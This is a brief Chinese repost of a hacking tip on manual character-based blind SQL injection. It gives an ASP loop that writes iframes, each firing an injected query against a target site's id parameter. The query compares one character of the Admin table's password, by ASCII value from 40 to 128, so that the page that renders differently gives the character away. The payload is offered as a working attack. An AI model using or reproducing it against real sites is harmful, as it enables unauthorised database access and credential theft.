字符型SQL注入猜解，利用iframe显示更方便 - 网站

到一个注入点是字符型的测试了几个工具貌似都不行那就只有手工了大家都知道到猜解值的时候一个一个asc大小的比较还是比较麻烦的所以想到这个 <% for s=40 to 128 response.write "<iframe src=""http://HdhCmsTest2cto测试数据 /default. asp ?id=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1""></iframe>" next %> 这样一下就能显示所以存在的可能就能很方便的查看哪个值对应的页面有所不一样摘自影子鹰

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did12497

更新时间：2022-09-13 阅读：44次